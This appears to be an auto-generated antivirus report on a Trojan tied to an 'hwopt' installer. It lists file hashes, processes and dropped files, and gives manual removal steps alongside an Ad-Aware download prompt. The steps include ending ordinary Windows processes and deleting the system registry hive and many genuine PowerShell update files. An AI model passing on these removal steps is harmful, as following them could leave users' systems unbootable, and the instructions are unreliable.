fe7bc06af17d7cd8fb8e6d72d72453b8c:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe.mui
95b7f12a557dedac5e4a1e9afa5e73abc:\WINDOWS\system32\WindowsPowerShell\v1.0\pspluginwkr.dll
a94243b797377ba03b63fc716c13bcf5c:\WINDOWS\system32\WindowsPowerShell\v1.0\pwrshmsg.dll
7943a80f1a6fd37969aacd411b511f91c:\WINDOWS\system32\WindowsPowerShell\v1.0\pwrshsip.dll
2c9c9ae86eb2b4e78c8e09deb7509a63c:\WINDOWS\system32\WsmAuto.dll
67146d3606be1111a39f0fd61f47e9b6c:\WINDOWS\system32\WsmRes.dll
18f347402da544a780949b8fdf83351bc:\WINDOWS\system32\WsmSvc.dll
296e6992278fea7140d88b603e6c2a8ac:\WINDOWS\system32\WsmWmiPl.dll
84e025b1259c66315f4d45a6caecacc9c:\WINDOWS\system32\wevtfwd.dll
cd17705af8e53a82facb545a213ab09cc:\WINDOWS\system32\winrmprov.dll
afdf7654880ce23005014895b129d948c:\WINDOWS\system32\winrs.exe
3e9b11880ae4a8ff399ce0573c82655bc:\WINDOWS\system32\winrscmd.dll
62021e3e6ba13d72cf5cc1047cfac991c:\WINDOWS\system32\winrshost.exe
b84092e52861a026fc83bcede4a7abfac:\WINDOWS\system32\winrsmgr.dll
35bc7c49676e5ab617ef94dc9854a6f1c:\WINDOWS\system32\winrssrv.dll
972916faac89c4aa978952b30f478e81c:\WINDOWS\system32\wsmanhttpconfig.exe
23ce21efc2ae95700f2b1f9582fe3867c:\WINDOWS\system32\wsmplpxy.dll
faa2fcc6853e5123e05dccc5919657e2c:\WINDOWS\system32\wsmprovhost.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

Removals

Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.

Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    csc.exe:1992
    csc.exe:888
    csc.exe:444
    csc.exe:1532
    csc.exe:544
    csc.exe:2008
    csc.exe:332
    csc.exe:1752
    csc.exe:1512
    07-04-2016_hwopt_3.0.10-1.tmp:432
    MSIF2.tmp:3740
    netsh.exe:652
    netsh.exe:2084
    InstallUtil.exe:1744
    InstallUtil.exe:2024
    clicker.exe:2312
    clicker.exe:2452
    sc.exe:716
    sc.exe:588
    sc.exe:2000
    sc.exe:456
    sc.exe:504
    sc.exe:1752
    WindowsXP-KB968930-x86-ENG.exe:3496
    master.exe:1488
    mscorsvw.exe:4020
    mscorsvw.exe:3616
    mscorsvw.exe:2948
    mscorsvw.exe:3756
    mscorsvw.exe:2196
    mscorsvw.exe:3536
    mscorsvw.exe:3676
    mscorsvw.exe:3044
    mscorsvw.exe:2544
    mscorsvw.exe:2564
    mscorsvw.exe:1856
    mscorsvw.exe:3180
    mscorsvw.exe:2660
    mscorsvw.exe:2508
    mscorsvw.exe:2680
    mscorsvw.exe:2872
    mscorsvw.exe:3832
    mscorsvw.exe:3872
    mscorsvw.exe:304
    mscorsvw.exe:224
    mscorsvw.exe:1556
    mscorsvw.exe:2536
    mscorsvw.exe:2000
    mscorsvw.exe:2412
    mscorsvw.exe:2064
    wsmanhttpconfig.exe:2848
    wsmanhttpconfig.exe:2452
    MsiExec.exe:3168
    MsiExec.exe:2812
    %original file name%.exe:1328
    update.exe:3572
    PSCustomSetupUtil.exe:2428
    PSCustomSetupUtil.exe:3452
    PSCustomSetupUtil.exe:3416
    PSCustomSetupUtil.exe:2800
    PSCustomSetupUtil.exe:3068
    PSCustomSetupUtil.exe:3232
    PSCustomSetupUtil.exe:2300
    PSCustomSetupUtil.exe:2484
    PSCustomSetupUtil.exe:2548
    PSCustomSetupUtil.exe:3344
    PSCustomSetupUtil.exe:2388
    PSCustomSetupUtil.exe:2288
    PSCustomSetupUtil.exe:3664
    PSCustomSetupUtil.exe:2600
    PSCustomSetupUtil.exe:2876
    PSCustomSetupUtil.exe:3884
    PSCustomSetupUtil.exe:2284
    PSCustomSetupUtil.exe:3932
    PSCustomSetupUtil.exe:2976
    PSCustomSetupUtil.exe:3704
    PSCustomSetupUtil.exe:3544
    PSCustomSetupUtil.exe:3140
    PSCustomSetupUtil.exe:3784
    PSCustomSetupUtil.exe:3224
    PSCustomSetupUtil.exe:3984
    PSCustomSetupUtil.exe:3848
    regsvr32.exe:3056
    regsvr32.exe:2644
    summit_sharma.exe:2672
    07-04-2016_hwopt_3.0.10-1.exe:1632
    XBLive.exe:3008
    InstallationStatsUploder_12052016001648.exe:2044
    InstallationStatsUploder_12052016001648.exe:1488
    InstallationStatsUploder_12052016001648.exe:580
    InstallationStatsUploder_12052016001648.exe:1636
    InstallationStatsUploder_12052016001648.exe:1860
    InstallationStatsUploder_12052016001648.exe:1612
    InstallationStatsUploder_12052016001648.exe:640
    InstallationStatsUploder_12052016001648.exe:1848
    InstallationStatsUploder_12052016001648.exe:508
    InstallationStatsUploder_12052016001648.exe:1292
    InstallationStatsUploder_12052016001648.exe:1400
    EditBinx86.exe:960
    EditBinx86.exe:2012
    mofcomp.exe:2684
    ngen.exe:332
    ngen.exe:276
    ngen.exe:2092
    ngen.exe:3300
    ngen.exe:2136
    ngen.exe:3212
    ngen.exe:2056
    ngen.exe:3340
    ngen.exe:2248
    ngen.exe:3160
    ngen.exe:2112
    ngen.exe:2240
    ngen.exe:3232
    ngen.exe:444
    ngen.exe:1496
    ngen.exe:2188
    ngen.exe:2212
    ngen.exe:2276
    ngen.exe:780
    ngen.exe:3224
    ngen.exe:2024
    ngen.exe:2160
    ngen.exe:2148
    runonce.exe:3520
    cvtres.exe:308
    cvtres.exe:1968
    cvtres.exe:1556
    cvtres.exe:952
    cvtres.exe:1064
    cvtres.exe:340
    cvtres.exe:164
    cvtres.exe:504
    cvtres.exe:364
    Osman_Navigation.exe:4072
    PSSetupNativeUtils.exe:968
    fileman.exe:1636
    mastermind.exe:3740
    grpconv.exe:3484

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temp\pgamidov.dll (4150 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CSCF.tmp (664 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\pgamidov.out (396 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2q171lzo.dll (4150 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\2q171lzo.out (396 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CSCB.tmp (664 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CSC7.tmp (664 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.dll (4150 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\4_rcyvsa.out (396 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\kgul_apy.dll (4150 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CSCD.tmp (664 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\kgul_apy.out (396 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\8sqkbrnw.out (396 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CSC5.tmp (664 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\8sqkbrnw.dll (4150 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\xlrctlov.out (396 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CSC11.tmp (664 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\xlrctlov.dll (4150 bytes)
    %WinDir%\Temp\4p64sgqi.dll (4150 bytes)
    %WinDir%\Temp\4p64sgqi.out (396 bytes)
    %WinDir%\Temp\CSC13.tmp (664 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\uuxr7wdt.out (396 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CSC3.tmp (664 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\uuxr7wdt.dll (4150 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CSC9.tmp (664 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\spcebjga.dll (4150 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\spcebjga.out (396 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\EditBinx86.exe (28 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\x86_WinDivert.zip (9 bytes)
    %WinDir%\hwopt_12052016001648\unins000.dat (9300 bytes)
    %WinDir%\hwopt_12052016001648\addon\nss_tools\is-SG5DG.tmp (5873 bytes)
    %WinDir%\hwopt_12052016001648\Utils.dll (57 bytes)
    %WinDir%\hwopt_12052016001648\is-JSA3M.tmp (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\is-39PQT.tmp (28 bytes)
    %WinDir%\hwopt_12052016001648\is-3HV2J.tmp (28 bytes)
    %WinDir%\hwopt_12052016001648\addon\nss_tools\is-11RFO.tmp (601 bytes)
    %WinDir%\hwopt_12052016001648\addon\is-RR6J5.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\is-QADEL.tmp (9 bytes)
    %WinDir%\hwopt_12052016001648\is-NGNQK.tmp (6841 bytes)
    %WinDir%\hwopt_12052016001648\addon\nss_tools\is-KE3G3.tmp (5441 bytes)
    %WinDir%\hwopt_12052016001648\addon\nss_tools\is-0GUHR.tmp (2321 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\_isetup\_shfoldr.dll (23 bytes)
    %WinDir%\hwopt_12052016001648\is-KKUTO.tmp (3361 bytes)
    %WinDir%\hwopt_12052016001648\addon\is-H19H5.tmp (18 bytes)
    %WinDir%\hwopt_12052016001648\addon\nss_tools\is-4A1SP.tmp (14 bytes)
    %WinDir%\hwopt_12052016001648\addon\nss_tools\is-TJDF4.tmp (12 bytes)
    %WinDir%\hwopt_12052016001648\addon\is-TRQBO.tmp (12287 bytes)
    %WinDir%\hwopt_12052016001648\addon\is-1J7I3.tmp (1 bytes)
    %WinDir%\hwopt_12052016001648\is-7B37I.tmp (20 bytes)
    %WinDir%\hwopt_12052016001648\addon\nss_tools\is-J0U8C.tmp (601 bytes)
    %WinDir%\hwopt_12052016001648\addon\nss_tools\is-22OLL.tmp (2105 bytes)
    %WinDir%\hwopt_12052016001648\is-480KO.tmp (31 bytes)
    %WinDir%\hwopt_12052016001648\addon\nss_tools\is-37BTT.tmp (673 bytes)
    %WinDir%\hwopt_12052016001648\addon\is-3PU0B.tmp (5441 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\fileman.exe (673 bytes)
    %WinDir%\hwopt_12052016001648\addon\is-NUNLD.tmp (985 bytes)
    %WinDir%\hwopt_12052016001648\addon\nss_tools\is-VTGNO.tmp (601 bytes)
    %WinDir%\hwopt_12052016001648\is-1JNQO.tmp (25361 bytes)
    %WinDir%\hwopt_12052016001648\addon\is-B1DBC.tmp (673 bytes)
    %WinDir%\hwopt_12052016001648\addon\is-SVUH5.tmp (424 bytes)
    %WinDir%\hwopt_12052016001648\addon\is-FLV5J.tmp (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\Utilsx86.dll (57 bytes)
    %WinDir%\hwopt_12052016001648\addon\nss_tools\is-FCRIP.tmp (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\is-LKUF0.tmp (57 bytes)
    %WinDir%\hwopt_12052016001648\addon\nss_tools\is-SI3J3.tmp (673 bytes)
    %WinDir%\hwopt_12052016001648\addon\nss_tools\is-PL8C4.tmp (1281 bytes)
    %WinDir%\hwopt_12052016001648\addon\is-4S0ED.tmp (31 bytes)
    %WinDir%\hwopt_12052016001648\addon\is-DNIFE.tmp (6841 bytes)
    %WinDir%\hwopt_12052016001648\addon\is-HP0LE.tmp (1 bytes)
    %WinDir%\hwopt_12052016001648\addon\nss_tools\is-LS6F4.tmp (6841 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\is-U38O7.tmp\is-ADFMM.tmp (673 bytes)
    %WinDir%\hwopt_12052016001648\is-V18V5.tmp (16 bytes)
    %WinDir%\hwopt_12052016001648\addon\nss_tools\is-5O5GC.tmp (1281 bytes)
    %WinDir%\hwopt_12052016001648\is-LDP3M.tmp (2321 bytes)
    %WinDir%\hwopt_12052016001648\is-2JF6C.tmp (16 bytes)
    %WinDir%\hwopt_12052016001648\addon\is-H96Q4.tmp (7345 bytes)
    %WinDir%\hwopt_12052016001648\WinDivert.dll (18 bytes)
    %WinDir%\hwopt_12052016001648\addon\is-T8IBT.tmp (7971 bytes)
    %WinDir%\hwopt_12052016001648\hwopt12052016001648.InstallLog (732 bytes)
    %System%\config\SYSTEM.LOG (4777 bytes)
    %WinDir%\hwopt_12052016001648\hwopt12052016001648.InstallState (196 bytes)
    %System%\config\system (1723 bytes)
    C:\$Directory (288 bytes)
    %WinDir%\hwopt_12052016001648\InstallUtil.InstallLog (672 bytes)
    %WinDir%\hwopt_12052016001648\hwopt12052016001648_updater_service.InstallState (196 bytes)
    %WinDir%\hwopt_12052016001648\hwopt12052016001648_updater_service.InstallLog (876 bytes)
    %Documents and Settings%\%current user%\Application Data\b_dk.jpg (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw16.tmp (7405 bytes)
    %Documents and Settings%\%current user%\Application Data\chapter.gif (7192 bytes)
    %Documents and Settings%\%current user%\Application Data\1.png (234 bytes)
    %Documents and Settings%\%current user%\Application Data\28.svg (1 bytes)
    %Documents and Settings%\%current user%\Application Data\TerraceSawwortSouthernwood (2 bytes)
    %Documents and Settings%\%current user%\Application Data\septillions.dll (6 bytes)
    %Documents and Settings%\%current user%\Application Data\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Application Data\make.graphic.viewport.xml (1 bytes)
    C:\f1fab1e3e4f7fec893e8\update\update.exe (10748 bytes)
    C:\f1fab1e3e4f7fec893e8\about_language_keywords.help.txt (11 bytes)
    C:\f1fab1e3e4f7fec893e8\about_if.help.txt (3 bytes)
    C:\f1fab1e3e4f7fec893e8\windowsremotemanagement.adm (574 bytes)
    C:\f1fab1e3e4f7fec893e8\microsoft.powershell.editor.dll (14450 bytes)
    C:\f1fab1e3e4f7fec893e8\microsoft.backgroundintelligenttransfer.management.interop.dll (1532 bytes)
    C:\f1fab1e3e4f7fec893e8\about_modules.help.txt (13 bytes)
    C:\f1fab1e3e4f7fec893e8\update\updspapi.dll (5940 bytes)
    C:\f1fab1e3e4f7fec893e8\winrm.cmd (35 bytes)
    C:\f1fab1e3e4f7fec893e8\system.management.automation.dll-help.xml (16567 bytes)
    C:\f1fab1e3e4f7fec893e8\about_scripts.help.txt (12 bytes)
    C:\f1fab1e3e4f7fec893e8\about_wildcards.help.txt (3 bytes)
    C:\f1fab1e3e4f7fec893e8\microsoft.backgroundintelligenttransfer.management.dll (1537 bytes)
    C:\f1fab1e3e4f7fec893e8\about_aliases.help.txt (6 bytes)
    C:\f1fab1e3e4f7fec893e8\about_type_operators.help.txt (5 bytes)
    C:\f1fab1e3e4f7fec893e8\registry.format.ps1xml (20 bytes)
    C:\f1fab1e3e4f7fec893e8\about_try_catch_finally.help.txt (7 bytes)
    C:\f1fab1e3e4f7fec893e8\wsmauto.mof (4 bytes)
    C:\f1fab1e3e4f7fec893e8\about_regular_expressions.help.txt (5 bytes)
    C:\f1fab1e3e4f7fec893e8\about_methods.help.txt (6 bytes)
    C:\f1fab1e3e4f7fec893e8\winrm.ini (1956 bytes)
    C:\f1fab1e3e4f7fec893e8\types.ps1xml (2510 bytes)
    C:\f1fab1e3e4f7fec893e8\microsoft.powershell.security.resources.dll (9 bytes)
    C:\f1fab1e3e4f7fec893e8\wtrinstaller.ico (4803 bytes)
    C:\f1fab1e3e4f7fec893e8\wsmprovhost.exe (657 bytes)
    C:\f1fab1e3e4f7fec893e8\about_while.help.txt (2 bytes)
    C:\f1fab1e3e4f7fec893e8\about_parsing.help.txt (2 bytes)
    C:\f1fab1e3e4f7fec893e8\wsman.format.ps1xml (837 bytes)
    C:\f1fab1e3e4f7fec893e8\dotnettypes.format.ps1xml (266 bytes)
    C:\f1fab1e3e4f7fec893e8\about_trap.help.txt (10 bytes)
    C:\f1fab1e3e4f7fec893e8\about_bits_cmdlets.help.txt (7 bytes)
    C:\f1fab1e3e4f7fec893e8\spuninst.exe (3787 bytes)
    C:\f1fab1e3e4f7fec893e8\about_script_internationalization.help.txt (9 bytes)
    C:\f1fab1e3e4f7fec893e8\system.management.automation.resources.dll (3153 bytes)
    C:\f1fab1e3e4f7fec893e8\powershell_ise.exe (2526 bytes)
    C:\f1fab1e3e4f7fec893e8\pssetupnativeutils.exe (9 bytes)
    C:\f1fab1e3e4f7fec893e8\wsmauto.dll (1842 bytes)
    C:\f1fab1e3e4f7fec893e8\powershellcore.format.ps1xml (1492 bytes)
    C:\f1fab1e3e4f7fec893e8\pspluginwkr.dll (1756 bytes)
    C:\f1fab1e3e4f7fec893e8\powershelltrace.format.ps1xml (344 bytes)
    C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.diagnostics.dll-help.xml (2301 bytes)
    C:\f1fab1e3e4f7fec893e8\about_do.help.txt (2 bytes)
    C:\f1fab1e3e4f7fec893e8\about_variables.help.txt (6 bytes)
    C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.utility.resources.dll (508 bytes)
    C:\f1fab1e3e4f7fec893e8\update\update.inf (2457 bytes)
    C:\f1fab1e3e4f7fec893e8\about_path_syntax.help.txt (5 bytes)
    C:\f1fab1e3e4f7fec893e8\winrmprov.mof (789 bytes)
    C:\f1fab1e3e4f7fec893e8\about_operators.help.txt (770 bytes)
    C:\f1fab1e3e4f7fec893e8\about_reserved_words.help.txt (1 bytes)
    C:\f1fab1e3e4f7fec893e8\about_parameters.help.txt (9 bytes)
    C:\f1fab1e3e4f7fec893e8\windowsremoteshell.adm (12 bytes)
    C:\f1fab1e3e4f7fec893e8\compiledcomposition.microsoft.powershell.gpowershell.dll (1737 bytes)
    C:\f1fab1e3e4f7fec893e8\about_types.ps1xml.help.txt (481 bytes)
    C:\f1fab1e3e4f7fec893e8\about_pssession_details.help.txt (9 bytes)
    C:\f1fab1e3e4f7fec893e8\about_ref.help.txt (1 bytes)
    C:\f1fab1e3e4f7fec893e8\default.help.txt (2 bytes)
    C:\f1fab1e3e4f7fec893e8\microsoft.wsman.runtime.dll (33 bytes)
    C:\f1fab1e3e4f7fec893e8\about_transactions.help.txt (1011 bytes)
    C:\f1fab1e3e4f7fec893e8\about_comment_based_help.help.txt (595 bytes)
    C:\f1fab1e3e4f7fec893e8\about_pssnapins.help.txt (6 bytes)
    C:\f1fab1e3e4f7fec893e8\about_core_commands.help.txt (221 bytes)
    C:\f1fab1e3e4f7fec893e8\eventforwarding.adm (2 bytes)
    C:\f1fab1e3e4f7fec893e8\about_format.ps1xml.help.txt (17 bytes)
    C:\f1fab1e3e4f7fec893e8\about_hash_tables.help.txt (6 bytes)
    C:\f1fab1e3e4f7fec893e8\pwrshplugin.dll (802 bytes)
    C:\f1fab1e3e4f7fec893e8\about_eventlogs.help.txt (5 bytes)
    C:\f1fab1e3e4f7fec893e8\certificate.format.ps1xml (155 bytes)
    C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.management.resources.dll (508 bytes)
    C:\f1fab1e3e4f7fec893e8\about_ws-management_cmdlets.help.txt (405 bytes)
    C:\f1fab1e3e4f7fec893e8\microsoft.powershell.gpowershell.dll (9738 bytes)
    C:\f1fab1e3e4f7fec893e8\importallmodules.psd1 (438 bytes)
    C:\f1fab1e3e4f7fec893e8\pwrshsip.dll (24 bytes)
    C:\f1fab1e3e4f7fec893e8\about_remote_troubleshooting.help.txt (146 bytes)
    C:\f1fab1e3e4f7fec893e8\wsmwmipl.dll (2816 bytes)
    C:\f1fab1e3e4f7fec893e8\about_requires.help.txt (2 bytes)
    C:\f1fab1e3e4f7fec893e8\about_command_syntax.help.txt (5 bytes)
    C:\f1fab1e3e4f7fec893e8\about_remote_faq.help.txt (775 bytes)
    C:\f1fab1e3e4f7fec893e8\microsoft.powershell.gpowershell.resources.dll (408 bytes)
    C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.management.dll (3386 bytes)
    C:\f1fab1e3e4f7fec893e8\about_wmi_cmdlets.help.txt (8 bytes)
    C:\f1fab1e3e4f7fec893e8\about_functions_advanced_methods.help.txt (9 bytes)
    C:\f1fab1e3e4f7fec893e8\getevent.types.ps1xml (15 bytes)
    C:\f1fab1e3e4f7fec893e8\about_split.help.txt (10 bytes)
    C:\f1fab1e3e4f7fec893e8\wsmsvc.dll (15909 bytes)
    C:\f1fab1e3e4f7fec893e8\profile.ps1 (772 bytes)
    C:\f1fab1e3e4f7fec893e8\about_locations.help.txt (794 bytes)
    C:\f1fab1e3e4f7fec893e8\about_pipelines.help.txt (411 bytes)
    C:\f1fab1e3e4f7fec893e8\pwrshmsg.dll (4 bytes)
    C:\f1fab1e3e4f7fec893e8\winrsmgr.dll (2 bytes)
    C:\f1fab1e3e4f7fec893e8\update\spcustom.dll (23 bytes)
    C:\f1fab1e3e4f7fec893e8\microsoft.powershell.consolehost.dll-help.xml (900 bytes)
    C:\f1fab1e3e4f7fec893e8\about_functions_advanced_parameters.help.txt (962 bytes)
    C:\f1fab1e3e4f7fec893e8\about_remote.help.txt (7 bytes)
    C:\f1fab1e3e4f7fec893e8\wsmpty.xsl (1 bytes)
    C:\f1fab1e3e4f7fec893e8\update\update.ver (14 bytes)
    C:\f1fab1e3e4f7fec893e8\about_properties.help.txt (7 bytes)
    C:\f1fab1e3e4f7fec893e8\about_break.help.txt (792 bytes)
    C:\f1fab1e3e4f7fec893e8\about_quoting_rules.help.txt (659 bytes)
    C:\f1fab1e3e4f7fec893e8\spupdsvc.exe (287 bytes)
    C:\f1fab1e3e4f7fec893e8\about_functions_advanced.help.txt (3 bytes)
    C:\f1fab1e3e4f7fec893e8\wsmtxt.xsl (2 bytes)
    C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.utility.dll (9684 bytes)
    C:\f1fab1e3e4f7fec893e8\about_redirection.help.txt (2 bytes)
    C:\f1fab1e3e4f7fec893e8\winrs.exe (1154 bytes)
    C:\f1fab1e3e4f7fec893e8\help.format.ps1xml (3947 bytes)
    C:\f1fab1e3e4f7fec893e8\wsmres.dll (6164 bytes)
    C:\f1fab1e3e4f7fec893e8\winrssrv.dll (12 bytes)
    C:\f1fab1e3e4f7fec893e8\about_continue.help.txt (1 bytes)
    C:\f1fab1e3e4f7fec893e8\microsoft.wsman.management.dll (5010 bytes)
    C:\f1fab1e3e4f7fec893e8\about_return.help.txt (3 bytes)
    C:\f1fab1e3e4f7fec893e8\about_objects.help.txt (2 bytes)
    C:\f1fab1e3e4f7fec893e8\about_environment_variables.help.txt (417 bytes)
    C:\f1fab1e3e4f7fec893e8\update\kb968930xp.cat (512 bytes)
    C:\f1fab1e3e4f7fec893e8\microsoft.powershell.consolehost.resources.dll (778 bytes)
    C:\f1fab1e3e4f7fec893e8\about_remote_jobs.help.txt (13 bytes)
    C:\f1fab1e3e4f7fec893e8\bitstransfer.psd1 (950 bytes)
    C:\f1fab1e3e4f7fec893e8\about_remote_requirements.help.txt (6 bytes)
    C:\f1fab1e3e4f7fec893e8\about_remote_output.help.txt (887 bytes)
    C:\f1fab1e3e4f7fec893e8\about_functions_cmdletbindingattribute.help.txt (3 bytes)
    C:\f1fab1e3e4f7fec893e8\about_script_blocks.help.txt (3 bytes)
    C:\f1fab1e3e4f7fec893e8\about_profiles.help.txt (457 bytes)
    C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.diagnostics.resources.dll (470 bytes)
    C:\f1fab1e3e4f7fec893e8\microsoft.wsman.management.resources.dll (13 bytes)
    C:\f1fab1e3e4f7fec893e8\winrscmd.dll (2907 bytes)
    C:\f1fab1e3e4f7fec893e8\about_arrays.help.txt (8 bytes)
    C:\f1fab1e3e4f7fec893e8\about_signing.help.txt (12 bytes)
    C:\f1fab1e3e4f7fec893e8\about_automatic_variables.help.txt (14 bytes)
    C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.utility.dll-help.xml (20810 bytes)
    C:\f1fab1e3e4f7fec893e8\microsoft.powershell.graphicalhost.resources.dll (16 bytes)
    C:\f1fab1e3e4f7fec893e8\spmsg.dll (495 bytes)
    C:\f1fab1e3e4f7fec893e8\about_windows_powershell_ise.help.txt (6 bytes)
    C:\f1fab1e3e4f7fec893e8\about_data_sections.help.txt (5 bytes)
    C:\f1fab1e3e4f7fec893e8\about_providers.help.txt (59 bytes)
    C:\f1fab1e3e4f7fec893e8\powershell_ise.resources.dll (4 bytes)
    C:\f1fab1e3e4f7fec893e8\about_debuggers.help.txt (21 bytes)
    C:\f1fab1e3e4f7fec893e8\microsoft.powershell.editor.resources.dll (562 bytes)
    C:\f1fab1e3e4f7fec893e8\pscustomsetuputil.exe (316 bytes)
    C:\f1fab1e3e4f7fec893e8\winrmprov.dll (591 bytes)
    C:\f1fab1e3e4f7fec893e8\diagnostics.format.ps1xml (590 bytes)
    C:\f1fab1e3e4f7fec893e8\about_logical_operators.help.txt (2 bytes)
    C:\f1fab1e3e4f7fec893e8\about_line_editing.help.txt (1 bytes)
    C:\f1fab1e3e4f7fec893e8\about_command_precedence.help.txt (8 bytes)
    C:\f1fab1e3e4f7fec893e8\filesystem.format.ps1xml (133 bytes)
    C:\f1fab1e3e4f7fec893e8\powershell.exe.mui (10 bytes)
    C:\f1fab1e3e4f7fec893e8\about_session_configurations.help.txt (276 bytes)
    C:\f1fab1e3e4f7fec893e8\about_prompts.help.txt (7 bytes)
    C:\f1fab1e3e4f7fec893e8\microsoft.powershell.security.dll (1145 bytes)
    C:\f1fab1e3e4f7fec893e8\about_assignment_operators.help.txt (379 bytes)
    C:\f1fab1e3e4f7fec893e8\$shtdwn$.req (788 bytes)
    C:\f1fab1e3e4f7fec893e8\bitstransfer.format.ps1xml (16 bytes)
    C:\f1fab1e3e4f7fec893e8\windowspowershellhelp.chm (26041 bytes)
    C:\f1fab1e3e4f7fec893e8\microsoft.powershell.graphicalhost.dll (4408 bytes)
    C:\f1fab1e3e4f7fec893e8\about_execution_policies.help.txt (13 bytes)
    C:\f1fab1e3e4f7fec893e8\microsoft.wsman.management.dll-help.xml (8740 bytes)
    C:\f1fab1e3e4f7fec893e8\about_switch.help.txt (489 bytes)
    C:\f1fab1e3e4f7fec893e8\about_throw.help.txt (5 bytes)
    C:\f1fab1e3e4f7fec893e8\about_join.help.txt (2 bytes)
    C:\f1fab1e3e4f7fec893e8\microsoft.powershell.security.dll-help.xml (1797 bytes)
    C:\f1fab1e3e4f7fec893e8\wevtfwd.dll (3351 bytes)
    C:\f1fab1e3e4f7fec893e8\about_escape_characters.help.txt (2 bytes)
    C:\f1fab1e3e4f7fec893e8\update\eula.txt (586 bytes)
    C:\f1fab1e3e4f7fec893e8\winrm.vbs (2727 bytes)
    C:\f1fab1e3e4f7fec893e8\about_comparison_operators.help.txt (11 bytes)
    C:\f1fab1e3e4f7fec893e8\about_arithmetic_operators.help.txt (168 bytes)
    C:\f1fab1e3e4f7fec893e8\microsoft.backgroundintelligenttransfer.management.dll-help.xml (2472 bytes)
    C:\f1fab1e3e4f7fec893e8\about_functions.help.txt (586 bytes)
    C:\f1fab1e3e4f7fec893e8\about_special_characters.help.txt (3 bytes)
    C:\f1fab1e3e4f7fec893e8\winrshost.exe (22 bytes)
    C:\f1fab1e3e4f7fec893e8\about_jobs.help.txt (12 bytes)
    C:\f1fab1e3e4f7fec893e8\about_scopes.help.txt (76 bytes)
    C:\f1fab1e3e4f7fec893e8\about_commonparameters.help.txt (12 bytes)
    C:\f1fab1e3e4f7fec893e8\wsmplpxy.dll (603 bytes)
    C:\f1fab1e3e4f7fec893e8\about_preference_variables.help.txt (37 bytes)
    C:\f1fab1e3e4f7fec893e8\about_foreach.help.txt (10 bytes)
    C:\f1fab1e3e4f7fec893e8\about_windows_powershell_2.0.help.txt (453 bytes)
    C:\f1fab1e3e4f7fec893e8\about_history.help.txt (3 bytes)
    C:\f1fab1e3e4f7fec893e8\wsmanhttpconfig.exe (3009 bytes)
    C:\f1fab1e3e4f7fec893e8\about_pssessions.help.txt (9 bytes)
    C:\f1fab1e3e4f7fec893e8\about_job_details.help.txt (824 bytes)
    C:\f1fab1e3e4f7fec893e8\microsoft.backgroundintelligenttransfer.management.resources.dll (7 bytes)
    C:\f1fab1e3e4f7fec893e8\microsoft.powershell.commands.management.dll-help.xml (28236 bytes)
    C:\f1fab1e3e4f7fec893e8\about_for.help.txt (146 bytes)
    %WinDir%\Temp\4p64sgqi.cmdline (358 bytes)
    %WinDir%\Temp\4p64sgqi.0.cs (676 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPFE.tmp\Microsoft.PowerShell.ConsoleHost.dll (33378 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPFC.tmp\Microsoft.PowerShell.Commands.Management.dll (45020 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPFB.tmp\Microsoft.PowerShell.Commands.Diagnostics.dll (33116 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAPF6.tmp\Microsoft.BackgroundIntelligentTransfer.Management.dll (27440 bytes)
    %WinDir%\assembly\NativeImages_v2.0.50727_32\Temp\ZAP104.tmp\Microsoft.WSMan.Runtime.dll (17713 bytes)
